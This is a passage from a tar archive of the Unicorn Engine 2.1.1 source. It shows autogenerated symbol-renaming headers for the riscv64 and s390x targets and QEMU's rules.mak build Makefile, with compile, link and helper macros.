helper_gvec_ussub32_riscv64 #define helper_gvec_ussub64 helper_gvec_ussub64_riscv64 #define helper_gvec_smin8 helper_gvec_smin8_riscv64 #define helper_gvec_smin16 helper_gvec_smin16_riscv64 #define helper_gvec_smin32 helper_gvec_smin32_riscv64 #define helper_gvec_smin64 helper_gvec_smin64_riscv64 #define helper_gvec_smax8 helper_gvec_smax8_riscv64 #define helper_gvec_smax16 helper_gvec_smax16_riscv64 #define helper_gvec_smax32 helper_gvec_smax32_riscv64 #define helper_gvec_smax64 helper_gvec_smax64_riscv64 #define helper_gvec_umin8 helper_gvec_umin8_riscv64 #define helper_gvec_umin16 helper_gvec_umin16_riscv64 #define helper_gvec_umin32 helper_gvec_umin32_riscv64 #define helper_gvec_umin64 helper_gvec_umin64_riscv64 #define helper_gvec_umax8 helper_gvec_umax8_riscv64 #define helper_gvec_umax16 helper_gvec_umax16_riscv64 #define helper_gvec_umax32 helper_gvec_umax32_riscv64 #define helper_gvec_umax64 helper_gvec_umax64_riscv64 #define helper_gvec_bitsel helper_gvec_bitsel_riscv64 #define cpu_restore_state cpu_restore_state_riscv64 #define page_collection_lock page_collection_lock_riscv64 #define page_collection_unlock page_collection_unlock_riscv64 #define free_code_gen_buffer free_code_gen_buffer_riscv64 #define tcg_exec_init tcg_exec_init_riscv64 #define tb_cleanup tb_cleanup_riscv64 #define tb_flush tb_flush_riscv64 #define tb_phys_invalidate tb_phys_invalidate_riscv64 #define tb_gen_code tb_gen_code_riscv64 #define tb_exec_lock tb_exec_lock_riscv64 #define tb_exec_unlock tb_exec_unlock_riscv64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_riscv64 #define tb_invalidate_phys_range tb_invalidate_phys_range_riscv64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_riscv64 #define tb_check_watchpoint tb_check_watchpoint_riscv64 #define cpu_io_recompile cpu_io_recompile_riscv64 #define tb_flush_jmp_cache tb_flush_jmp_cache_riscv64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_riscv64 #define translator_loop_temp_check translator_loop_temp_check_riscv64 #define translator_loop translator_loop_riscv64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_riscv64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_riscv64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_riscv64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_riscv64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_riscv64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_riscv64 #define unassigned_mem_ops unassigned_mem_ops_riscv64 #define floatx80_infinity floatx80_infinity_riscv64 #define dup_const_func dup_const_func_riscv64 #define gen_helper_raise_exception gen_helper_raise_exception_riscv64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_riscv64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_riscv64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_riscv64 #define gen_helper_cpsr_read gen_helper_cpsr_read_riscv64 #define gen_helper_cpsr_write gen_helper_cpsr_write_riscv64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_riscv64 #define riscv_cpu_mmu_index riscv_cpu_mmu_index_riscv64 #define riscv_cpu_exec_interrupt riscv_cpu_exec_interrupt_riscv64 #define riscv_cpu_fp_enabled riscv_cpu_fp_enabled_riscv64 #define riscv_cpu_swap_hypervisor_regs riscv_cpu_swap_hypervisor_regs_riscv64 #define riscv_cpu_virt_enabled riscv_cpu_virt_enabled_riscv64 #define riscv_cpu_set_virt_enabled riscv_cpu_set_virt_enabled_riscv64 #define riscv_cpu_force_hs_excep_enabled riscv_cpu_force_hs_excep_enabled_riscv64 #define riscv_cpu_set_force_hs_excep riscv_cpu_set_force_hs_excep_riscv64 #define riscv_cpu_claim_interrupts riscv_cpu_claim_interrupts_riscv64 #define riscv_cpu_update_mip riscv_cpu_update_mip_riscv64 #define riscv_cpu_set_rdtime_fn riscv_cpu_set_rdtime_fn_riscv64 #define riscv_cpu_set_mode riscv_cpu_set_mode_riscv64 #define riscv_cpu_get_phys_page_debug riscv_cpu_get_phys_page_debug_riscv64 #define riscv_cpu_do_transaction_failed riscv_cpu_do_transaction_failed_riscv64 #define riscv_cpu_do_unaligned_access riscv_cpu_do_unaligned_access_riscv64 #define riscv_cpu_tlb_fill riscv_cpu_tlb_fill_riscv64 #define riscv_cpu_do_interrupt riscv_cpu_do_interrupt_riscv64 #define riscv_get_csr_ops riscv_get_csr_ops_riscv64 #define riscv_set_csr_ops riscv_set_csr_ops_riscv64 #define riscv_csrrw riscv_csrrw_riscv64 #define riscv_csrrw_debug riscv_csrrw_debug_riscv64 #define riscv_cpu_get_fflags riscv_cpu_get_fflags_riscv64 #define riscv_cpu_set_fflags riscv_cpu_set_fflags_riscv64 #define helper_set_rounding_mode helper_set_rounding_mode_riscv64 #define helper_fmadd_s helper_fmadd_s_riscv64 #define helper_fmadd_d helper_fmadd_d_riscv64 #define helper_fmsub_s helper_fmsub_s_riscv64 #define helper_fmsub_d helper_fmsub_d_riscv64 #define helper_fnmsub_s helper_fnmsub_s_riscv64 #define helper_fnmsub_d helper_fnmsub_d_riscv64 #define helper_fnmadd_s helper_fnmadd_s_riscv64 #define helper_fnmadd_d helper_fnmadd_d_riscv64 #define helper_fadd_s helper_fadd_s_riscv64 #define helper_fsub_s helper_fsub_s_riscv64 #define helper_fmul_s helper_fmul_s_riscv64 #define helper_fdiv_s helper_fdiv_s_riscv64 #define helper_fmin_s helper_fmin_s_riscv64 #define helper_fmax_s helper_fmax_s_riscv64 #define helper_fsqrt_s helper_fsqrt_s_riscv64 #define helper_fle_s helper_fle_s_riscv64 #define helper_flt_s helper_flt_s_riscv64 #define helper_feq_s helper_feq_s_riscv64 #define helper_fcvt_w_s helper_fcvt_w_s_riscv64 #define helper_fcvt_wu_s helper_fcvt_wu_s_riscv64 #define helper_fcvt_s_w helper_fcvt_s_w_riscv64 #define helper_fcvt_s_wu helper_fcvt_s_wu_riscv64 #define helper_fclass_s helper_fclass_s_riscv64 #define helper_fadd_d helper_fadd_d_riscv64 #define helper_fsub_d helper_fsub_d_riscv64 #define helper_fmul_d helper_fmul_d_riscv64 #define helper_fdiv_d helper_fdiv_d_riscv64 #define helper_fmin_d helper_fmin_d_riscv64 #define helper_fmax_d helper_fmax_d_riscv64 #define helper_fcvt_s_d helper_fcvt_s_d_riscv64 #define helper_fcvt_d_s helper_fcvt_d_s_riscv64 #define helper_fsqrt_d helper_fsqrt_d_riscv64 #define helper_fle_d helper_fle_d_riscv64 #define helper_flt_d helper_flt_d_riscv64 #define helper_feq_d helper_feq_d_riscv64 #define helper_fcvt_w_d helper_fcvt_w_d_riscv64 #define helper_fcvt_wu_d helper_fcvt_wu_d_riscv64 #define helper_fcvt_d_w helper_fcvt_d_w_riscv64 #define helper_fcvt_d_wu helper_fcvt_d_wu_riscv64 #define helper_fclass_d helper_fclass_d_riscv64 #define riscv_raise_exception riscv_raise_exception_riscv64 #define helper_raise_exception helper_raise_exception_riscv64 #define helper_uc_riscv_exit helper_uc_riscv_exit_riscv64 #define helper_csrrw helper_csrrw_riscv64 #define helper_csrrs helper_csrrs_riscv64 #define helper_csrrc helper_csrrc_riscv64 #define helper_sret helper_sret_riscv64 #define helper_mret helper_mret_riscv64 #define helper_wfi helper_wfi_riscv64 #define helper_tlb_flush helper_tlb_flush_riscv64 #define pmp_hart_has_privs pmp_hart_has_privs_riscv64 #define pmpcfg_csr_write pmpcfg_csr_write_riscv64 #define pmpcfg_csr_read pmpcfg_csr_read_riscv64 #define pmpaddr_csr_write pmpaddr_csr_write_riscv64 #define pmpaddr_csr_read pmpaddr_csr_read_riscv64 #define gen_intermediate_code gen_intermediate_code_riscv64 #define riscv_translate_init riscv_translate_init_riscv64 #define restore_state_to_opc restore_state_to_opc_riscv64 #define cpu_riscv_init cpu_riscv_init_riscv64 #define helper_fcvt_l_s helper_fcvt_l_s_riscv64 #define helper_fcvt_lu_s helper_fcvt_lu_s_riscv64 #define helper_fcvt_s_l helper_fcvt_s_l_riscv64 #define helper_fcvt_s_lu helper_fcvt_s_lu_riscv64 #define helper_fcvt_l_d helper_fcvt_l_d_riscv64 #define helper_fcvt_lu_d helper_fcvt_lu_d_riscv64 #define helper_fcvt_d_l helper_fcvt_d_l_riscv64 #define helper_fcvt_d_lu helper_fcvt_d_lu_riscv64 #define gen_helper_tlb_flush gen_helper_tlb_flush_riscv64 #define riscv_fpr_regnames riscv_fpr_regnames_riscv64 #define riscv_int_regnames riscv_int_regnames_riscv64 #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/rules.mak������������������������������������������������������������������������0000664�0000000�0000000�00000040261�14675241067�0016002�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ # These are used when we want to do substitutions without confusing Make NULL := SPACE := $(NULL) # COMMA := , # Don't use implicit rules or variables # we have explicit rules for everything MAKEFLAGS += -rR # Files with this suffixes are final, don't try to generate them # using implicit rules %/trace-events: %.hx: %.py: %.objs: %.d: %.h: %.c: %.cc: %.cpp: %.m: %.mak: clean-target: # Flags for dependency generation QEMU_DGFLAGS += -MMD -MP -MT $@ -MF $(@D)/$(*F).d # Compiler searches the source file dir first, but in vpath builds # we need to make it search the build dir too, before any other # explicit search paths. There are two search locations in the build # dir, one absolute and the other relative to the compiler working # directory. These are the same for target-independent files, but # different for target-dependent ones. QEMU_LOCAL_INCLUDES = -iquote $(BUILD_DIR)/$(@D) -iquote $(@D) WL_U := -Wl,-u, find-symbols = $(if $1, $(sort $(shell $(NM) -P -g $1 | $2))) defined-symbols = $(call find-symbols,$1,awk '$$2!="U"{print $$1}') undefined-symbols = $(call find-symbols,$1,awk '$$2=="U"{print $$1}') # All the .mo objects in -m variables are also added into corresponding -y # variable in unnest-vars, but filtered out here, when LINK is called. # # The .mo objects are supposed to be linked as a DSO, for module build. So here # they are only used as a placeholders to generate those "archive undefined" # symbol options (-Wl,-u,$symbol_name), which are the archive functions # referenced by the code in the DSO. # # Also the presence in -y variables will also guarantee they are built before # linking executables that will load them. So we can look up symbol reference # in LINK. # # This is necessary because the exectuable itself may not use the function, in # which case the function would not be linked in. Then the DSO loading will # fail because of the missing symbol. process-archive-undefs = $(filter-out %.a %.mo,$1) \ $(addprefix $(WL_U), \ $(filter $(call defined-symbols,$(filter %.a, $1)), \ $(call undefined-symbols,$(filter %.mo,$1)))) \ $(filter %.a,$1) extract-libs = $(strip $(foreach o,$(filter-out %.mo,$1),$($o-libs))) expand-objs = $(strip $(sort $(filter %.o,$1)) \ $(foreach o,$(filter %.mo,$1),$($o-objs)) \ $(filter-out %.o %.mo,$1)) %.o: %.c $(call quiet-command,$(CC) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \ $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \ -c -o $@ $<,"CC","$(TARGET_DIR)$@") %.o: %.rc $(call quiet-command,$(WINDRES) -I. -o $@ $<,"RC","$(TARGET_DIR)$@") # If we have a CXX we might have some C++ objects, in which case we # must link with the C++ compiler, not the plain C compiler. LINKPROG = $(or $(CXX),$(CC)) LINK = $(call quiet-command, $(LINKPROG) $(CFLAGS) $(QEMU_LDFLAGS) -o $@ \ $(call process-archive-undefs, $1) \ $(version-obj-y) $(call extract-libs,$1) $(LIBS),"LINK","$(TARGET_DIR)$@") %.o: %.S $(call quiet-command,$(CCAS) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \ $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) \ -c -o $@ $<,"CCAS","$(TARGET_DIR)$@") %.o: %.cc $(call quiet-command,$(CXX) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \ $(QEMU_CXXFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \ -c -o $@ $<,"CXX","$(TARGET_DIR)$@") %.o: %.cpp $(call quiet-command,$(CXX) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \ $(QEMU_CXXFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \ -c -o $@ $<,"CXX","$(TARGET_DIR)$@") %.o: %.m $(call quiet-command,$(OBJCC) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \ $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \ -c -o $@ $<,"OBJC","$(TARGET_DIR)$@") %.o: %.dtrace $(call quiet-command,dtrace -o $@ -G -s $<,"GEN","$(TARGET_DIR)$@") DSO_OBJ_CFLAGS := -fPIC -DBUILD_DSO module-common.o: CFLAGS += $(DSO_OBJ_CFLAGS) %$(DSOSUF): QEMU_LDFLAGS += $(LDFLAGS_SHARED) %$(DSOSUF): %.mo $(call LINK,$^) @# Copy to build root so modules can be loaded when program started without install $(if $(findstring /,$@),$(call quiet-command,cp $@ $(subst /,-,$@),"CP","$(subst /,-,$@)")) LD_REL := $(CC) -nostdlib $(LD_REL_FLAGS) %.mo: $(call quiet-command,$(LD_REL) -o $@ $^,"LD","$(TARGET_DIR)$@") .PHONY: modules modules: %$(EXESUF): %.o $(call LINK,$(filter %.o %.a %.mo, $^)) %.a: $(call quiet-command,rm -f $@ && $(AR) rcs $@ $^,"AR","$(TARGET_DIR)$@") # Usage: $(call quiet-command,command and args,"NAME","args to print") # This will run "command and args", and either: # if V=1 just print the whole command and args # otherwise print the 'quiet' output in the format " NAME args to print" # NAME should be a short name of the command, 7 letters or fewer. # If called with only a single argument, will print nothing in quiet mode. quiet-command-run = $(if $(V),,$(if $2,printf " %-7s %s\n" $2 $3 && ))$1 quiet-@ = $(if $(V),,@) quiet-command = $(quiet-@)$(call quiet-command-run,$1,$2,$3) # cc-option # Usage: CFLAGS+=$(call cc-option, -falign-functions=0, -malign-functions=0) cc-option = $(if $(shell $(CC) $1 $2 -S -o /dev/null -xc /dev/null \ >/dev/null 2>&1 && echo OK), $2, $3) cc-c-option = $(if $(shell $(CC) $1 $2 -c -o /dev/null -xc /dev/null \ >/dev/null 2>&1 && echo OK), $2, $3) VPATH_SUFFIXES = %.c %.h %.S %.cc %.cpp %.m %.mak %.texi %.sh %.rc Kconfig% %.json.in set-vpath = $(if $1,$(foreach PATTERN,$(VPATH_SUFFIXES),$(eval vpath $(PATTERN) $1))) # install-prog list, dir define install-prog $(INSTALL_DIR) "$2" $(INSTALL_PROG) $1 "$2" $(if $(STRIP),$(STRIP) $(foreach T,$1,"$2/$(notdir $T)"),) endef # find-in-path # Usage: $(call find-in-path, prog) # Looks in the PATH if the argument contains no slash, else only considers one # specific directory. Returns an # empty string if the program doesn't exist # there. find-in-path = $(if $(findstring /, $1), \ $(wildcard $1), \ $(wildcard $(patsubst %, %/$1, $(subst :, ,$(PATH))))) # Logical functions (for operating on y/n values like CONFIG_FOO vars) # Inputs to these must be either "y" (true) or "n" or "" (both false) # Output is always either "y" or "n". # Usage: $(call land,$(CONFIG_FOO),$(CONFIG_BAR)) # Logical NOT lnot = $(if $(subst n,,$1),n,y) # Logical AND land = $(if $(findstring yy,$1$2),y,n) # Logical OR lor = $(if $(findstring y,$1$2),y,n) # Logical XOR (note that this is the inverse of leqv) lxor = $(if $(filter $(call lnot,$1),$(call lnot,$2)),n,y) # Logical equivalence (note that leqv "","n" is true) leqv = $(if $(filter $(call lnot,$1),$(call lnot,$2)),y,n) # Logical if: like make's $(if) but with an leqv-like test lif = $(if $(subst n,,$1),$2,$3) # String testing functions: inputs to these can be any string; # the output is always either "y" or "n". Leading and trailing whitespace # is ignored when comparing strings. # String equality eq = $(if $(subst $2,,$1)$(subst $1,,$2),n,y) # String inequality ne = $(if $(subst $2,,$1)$(subst $1,,$2),y,n) # Emptiness/non-emptiness tests: isempty = $(if $1,n,y) notempty = $(if $1,y,n) # Generate files with tracetool TRACETOOL=$(PYTHON) $(SRC_PATH)/scripts/tracetool.py # Generate timestamp files for .h include files config-%.h: config-%.h-timestamp @cmp $< $@ >/dev/null 2>&1 || cp $< $@ config-%.h-timestamp: config-%.mak $(SRC_PATH)/scripts/create_config $(call quiet-command, sh $(SRC_PATH)/scripts/create_config < $< > $@,"GEN","$(TARGET_DIR)config-$*.h") .PHONY: clean-timestamp clean-timestamp: rm -f *.timestamp clean: clean-timestamp # will delete the target of a rule if commands exit with a nonzero exit status .DELETE_ON_ERROR: # save-vars # Usage: $(call save-vars, vars) # Save each variable $v in $vars as save-vars-$v, save their object's # variables, then clear $v. saved-vars-$v contains the variables that # where saved for the objects, in order to speedup load-vars. define save-vars $(foreach v,$1, $(eval save-vars-$v := $(value $v)) $(eval saved-vars-$v := $(foreach o,$($v), \ $(if $($o-cflags), $o-cflags $(eval save-vars-$o-cflags := $($o-cflags))$(eval $o-cflags := )) \ $(if $($o-libs), $o-libs $(eval save-vars-$o-libs := $($o-libs))$(eval $o-libs := )) \ $(if $($o-objs), $o-objs $(eval save-vars-$o-objs := $($o-objs))$(eval $o-objs := )))) $(eval $v := )) endef # load-vars # Usage: $(call load-vars, vars, add_var) # Load the saved value for each variable in @vars, and the per object # variables. # Append @add_var's current value to the loaded value. define load-vars $(eval $2-new-value := $(value $2)) $(foreach v,$1, $(eval $v := $(value save-vars-$v)) $(foreach o,$(saved-vars-$v), $(eval $o := $(save-vars-$o)) $(eval save-vars-$o := )) $(eval save-vars-$v := ) $(eval saved-vars-$v := )) $(eval $2 := $(value $2) $($2-new-value)) endef # fix-paths # Usage: $(call fix-paths, obj_path, src_path, vars) # Add prefix @obj_path to all objects in @vars, and add prefix @src_path to all # directories in @vars. define fix-paths $(foreach v,$3, $(foreach o,$($v), $(if $($o-libs), $(eval $1$o-libs := $($o-libs))) $(if $($o-cflags), $(eval $1$o-cflags := $($o-cflags))) $(if $($o-objs), $(eval $1$o-objs := $(addprefix $1,$($o-objs))))) $(eval $v := $(addprefix $1,$(filter-out %/,$($v))) \ $(addprefix $2,$(filter %/,$($v))))) endef # unnest-var-recursive # Usage: $(call unnest-var-recursive, obj_prefix, vars, var) # # Unnest @var by including subdir Makefile.objs, while protect others in @vars # unchanged. # # @obj_prefix is the starting point of object path prefix. # define unnest-var-recursive $(eval dirs := $(sort $(filter %/,$($3)))) $(eval $3 := $(filter-out %/,$($3))) $(foreach d,$(dirs:%/=%), $(call save-vars,$2) $(eval obj := $(if $1,$1/)$d) $(eval -include $(SRC_PATH)/$d/Makefile.objs) $(call fix-paths,$(if $1,$1/)$d/,$d/,$2) $(call load-vars,$2,$3) $(call unnest-var-recursive,$1,$2,$3)) endef # unnest-vars # Usage: $(call unnest-vars, obj_prefix, vars) # # @obj_prefix: object path prefix, can be empty, or '..', etc. Don't include # ending '/'. # # @vars: the list of variable names to unnest. # # This macro will scan subdirectories's Makefile.objs, include them, to build # up each variable listed in @vars. # # Per object and per module cflags and libs are saved with relative path fixed # as well, those variables include -libs, -cflags and -objs. Items in -objs are # also fixed to relative path against SRC_PATH plus the prefix @obj_prefix. # # All nested variables postfixed by -m in names are treated as DSO variables, # and will be built as modules, if enabled. # # A simple example of the unnest: # # obj_prefix = .. # vars = hot cold # hot = fire.o sun.o season/ # cold = snow.o water/ season/ # # Unnest through a faked source directory structure: # # SRC_PATH # ├── water # │ └── Makefile.objs──────────────────┐ # │ │ hot += steam.o │ # │ │ cold += ice.mo │ # │ │ ice.mo-libs := -licemaker │ # │ │ ice.mo-objs := ice1.o ice2.o │ # │ └──────────────────────────────┘ # │ # └── season # └── Makefile.objs──────┐ # │ hot += summer.o │ # │ cold += winter.o │ # └──────────────────┘ # # In the end, the result will be: # # hot = ../fire.o ../sun.o ../season/summer.o # cold = ../snow.o ../water/ice.mo ../season/winter.o # ../water/ice.mo-libs = -licemaker # ../water/ice.mo-objs = ../water/ice1.o ../water/ice2.o # # Note that 'hot' didn't include 'water/' in the input, so 'steam.o' is not # included. # define unnest-vars # In the case of target build (i.e. $1 == ..), fix path for top level # Makefile.objs objects $(if $1,$(call fix-paths,$1/,,$2)) # Descend and include every subdir Makefile.objs $(foreach v, $2, $(call unnest-var-recursive,$1,$2,$v) # Pass the .mo-cflags and .mo-libs along to its member objects $(foreach o, $(filter %.mo,$($v)), $(foreach p,$($o-objs), $(if $($o-cflags), $(eval $p-cflags += $($o-cflags))) $(if $($o-libs), $(eval $p-libs += $($o-libs)))))) # For all %.mo objects that are directly added into -y, just expand them $(foreach v,$(filter %-y,$2), $(eval $v := $(foreach o,$($v),$(if $($o-objs),$($o-objs),$o)))) $(foreach v,$(filter %-m,$2), # All .o found in *-m variables are single object modules, create .mo # for them $(foreach o,$(filter %.o,$($v)), $(eval $(o:%.o=%.mo)-objs := $o)) # Now unify .o in -m variable to .mo $(eval $v := $($v:%.o=%.mo)) $(eval modules-m += $($v)) # For module build, build shared libraries during "make modules" # For non-module build, add -m to -y $(if $(CONFIG_MODULES), $(foreach o,$($v), $(eval $($o-objs): CFLAGS += $(DSO_OBJ_CFLAGS)) $(eval $o: $($o-objs))) $(eval $(patsubst %-m,%-y,$v) += $($v)) $(eval modules: $($v:%.mo=%$(DSOSUF))), $(eval $(patsubst %-m,%-y,$v) += $(call expand-objs, $($v))))) # Post-process all the unnested vars $(foreach v,$2, $(foreach o, $(filter %.mo,$($v)), # Find all the .mo objects in variables and add dependency rules # according to .mo-objs. Report error if not set $(if $($o-objs), $(eval $(o:%.mo=%$(DSOSUF)): module-common.o $($o-objs)), $(error $o added in $v but $o-objs is not set))) $(shell mkdir -p ./ $(sort $(dir $($v)))) # Include all the .d files $(eval -include $(patsubst %.o,%.d,$(patsubst %.mo,%.d,$($v)))) $(eval $v := $(filter-out %/,$($v)))) endef TEXI2MAN = $(call quiet-command, \ perl -Ww -- $(SRC_PATH)/scripts/texi2pod.pl $(TEXI2PODFLAGS) $< $@.pod && \ $(POD2MAN) --section=$(subst .,,$(suffix $@)) --center=" " --release=" " $@.pod > $@, \ "GEN","$@") %.1: $(call TEXI2MAN) %.7: $(call TEXI2MAN) %.8: $(call TEXI2MAN) GEN_SUBST = $(call quiet-command, \ sed -e "s!@libexecdir@!$(libexecdir)!g" < $< > $@, \ "GEN","$@") %.json: %.json.in $(call GEN_SUBST) # Support for building multiple output files by atomically executing # a single rule which depends on several input files (so the rule # will be executed exactly once, not once per output file, and # not multiple times in parallel.) For more explanation see: # https://www.cmcrossroads.com/article/atomic-rules-gnu-make # Given a space-separated list of filenames, create the name of # a 'sentinel' file to use to indicate that they have been built. # We use fixed text on the end to avoid accidentally triggering # automatic pattern rules, and . on the start to make the file # not show up in ls output. sentinel = .$(subst $(SPACE),_,$(subst /,_,$1)).sentinel. # Define an atomic rule that builds multiple outputs from multiple inputs. # To use: # $(call atomic,out1 out2 ...,in1 in2 ...) # <TAB>rule to do the operation # # Make 4.3 will have native support for this, and you would be able # to instead write: # out1 out2 ... &: in1 in2 ... # <TAB>rule to do the operation # # The way this works is that it creates a make rule # "out1 out2 ... : sentinel-file ; @:" which says that the sentinel # depends on the dependencies, and the rule to do that is "do nothing". # Then we have a rule # "sentinel-file : in1 in2 ..." # whose commands start with "touch sentinel-file" and then continue # with the rule text provided by the user of this 'atomic' function. # The foreach... is there to delete the sentinel file if any of the # output files don't exist, so that we correctly rebuild in that situation. atomic = $(eval $1: $(call sentinel,$1) ; @:) \ $(call sentinel,$1) : $2 ; @touch $$@ \ $(foreach t,$1,$(if $(wildcard $t),,$(shell rm -f $(call sentinel,$1)))) print-%: @echo '$*=$($*)' �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/s390x.h��������������������������������������������������������������������������0000664�0000000�0000000�00000216202�14675241067�0015215�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_s390x_H #define UNICORN_AUTOGEN_s390x_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _s390x #endif #define unicorn_fill_tlb unicorn_fill_tlb_s390x #define reg_read reg_read_s390x #define reg_write reg_write_s390x #define uc_init uc_init_s390x #define uc_add_inline_hook uc_add_inline_hook_s390x #define uc_del_inline_hook uc_del_inline_hook_s390x #define tb_invalidate_phys_range tb_invalidate_phys_range_s390x #define use_idiv_instructions use_idiv_instructions_s390x #define arm_arch arm_arch_s390x #define tb_target_set_jmp_target tb_target_set_jmp_target_s390x #define have_bmi1 have_bmi1_s390x #define have_popcnt have_popcnt_s390x #define have_avx1 have_avx1_s390x #define have_avx2 have_avx2_s390x #define have_isa have_isa_s390x #define have_altivec have_altivec_s390x #define have_vsx have_vsx_s390x #define flush_icache_range flush_icache_range_s390x #define s390_facilities s390_facilities_s390x #define tcg_dump_op tcg_dump_op_s390x #define tcg_dump_ops tcg_dump_ops_s390x #define tcg_gen_and_i64 tcg_gen_and_i64_s390x #define tcg_gen_discard_i64 tcg_gen_discard_i64_s390x #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_s390x #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_s390x #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_s390x #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_s390x #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_s390x #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_s390x #define tcg_gen_ld_i64 tcg_gen_ld_i64_s390x #define tcg_gen_mov_i64 tcg_gen_mov_i64_s390x #define tcg_gen_movi_i64 tcg_gen_movi_i64_s390x #define tcg_gen_mul_i64 tcg_gen_mul_i64_s390x #define tcg_gen_or_i64 tcg_gen_or_i64_s390x #define tcg_gen_sar_i64 tcg_gen_sar_i64_s390x #define tcg_gen_shl_i64 tcg_gen_shl_i64_s390x #define tcg_gen_shr_i64 tcg_gen_shr_i64_s390x #define tcg_gen_st_i64 tcg_gen_st_i64_s390x #define tcg_gen_xor_i64 tcg_gen_xor_i64_s390x #define cpu_icount_to_ns cpu_icount_to_ns_s390x #define cpu_is_stopped cpu_is_stopped_s390x #define cpu_get_ticks cpu_get_ticks_s390x #define cpu_get_clock cpu_get_clock_s390x #define cpu_resume cpu_resume_s390x #define qemu_init_vcpu qemu_init_vcpu_s390x #define cpu_stop_current cpu_stop_current_s390x #define resume_all_vcpus resume_all_vcpus_s390x #define vm_start vm_start_s390x #define address_space_dispatch_compact address_space_dispatch_compact_s390x #define flatview_translate flatview_translate_s390x #define address_space_translate_for_iotlb address_space_translate_for_iotlb_s390x #define qemu_get_cpu qemu_get_cpu_s390x #define cpu_address_space_init cpu_address_space_init_s390x #define cpu_get_address_space cpu_get_address_space_s390x #define cpu_exec_unrealizefn cpu_exec_unrealizefn_s390x #define cpu_exec_initfn cpu_exec_initfn_s390x #define cpu_exec_realizefn cpu_exec_realizefn_s390x #define tb_invalidate_phys_addr tb_invalidate_phys_addr_s390x #define cpu_watchpoint_insert cpu_watchpoint_insert_s390x #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_s390x #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_s390x #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_s390x #define cpu_breakpoint_insert cpu_breakpoint_insert_s390x #define cpu_breakpoint_remove cpu_breakpoint_remove_s390x #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_s390x #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_s390x #define cpu_abort cpu_abort_s390x #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_s390x #define memory_region_section_get_iotlb memory_region_section_get_iotlb_s390x #define flatview_add_to_dispatch flatview_add_to_dispatch_s390x #define qemu_ram_get_host_addr qemu_ram_get_host_addr_s390x #define qemu_ram_get_offset qemu_ram_get_offset_s390x #define qemu_ram_get_used_length qemu_ram_get_used_length_s390x #define qemu_ram_is_shared qemu_ram_is_shared_s390x #define qemu_ram_pagesize qemu_ram_pagesize_s390x #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_s390x #define qemu_ram_alloc qemu_ram_alloc_s390x #define qemu_ram_free qemu_ram_free_s390x #define qemu_map_ram_ptr qemu_map_ram_ptr_s390x #define qemu_ram_block_host_offset qemu_ram_block_host_offset_s390x #define qemu_ram_block_from_host qemu_ram_block_from_host_s390x #define qemu_ram_addr_from_host qemu_ram_addr_from_host_s390x #define cpu_check_watchpoint cpu_check_watchpoint_s390x #define iotlb_to_section iotlb_to_section_s390x #define address_space_dispatch_new address_space_dispatch_new_s390x #define address_space_dispatch_free address_space_dispatch_free_s390x #define flatview_read_continue flatview_read_continue_s390x #define address_space_read_full address_space_read_full_s390x #define address_space_write address_space_write_s390x #define address_space_rw address_space_rw_s390x #define cpu_physical_memory_rw cpu_physical_memory_rw_s390x #define address_space_write_rom address_space_write_rom_s390x #define cpu_flush_icache_range cpu_flush_icache_range_s390x #define cpu_exec_init_all cpu_exec_init_all_s390x #define address_space_access_valid address_space_access_valid_s390x #define address_space_map address_space_map_s390x #define address_space_unmap address_space_unmap_s390x #define cpu_physical_memory_map cpu_physical_memory_map_s390x #define cpu_physical_memory_unmap cpu_physical_memory_unmap_s390x #define cpu_memory_rw_debug cpu_memory_rw_debug_s390x #define qemu_target_page_size qemu_target_page_size_s390x #define qemu_target_page_bits 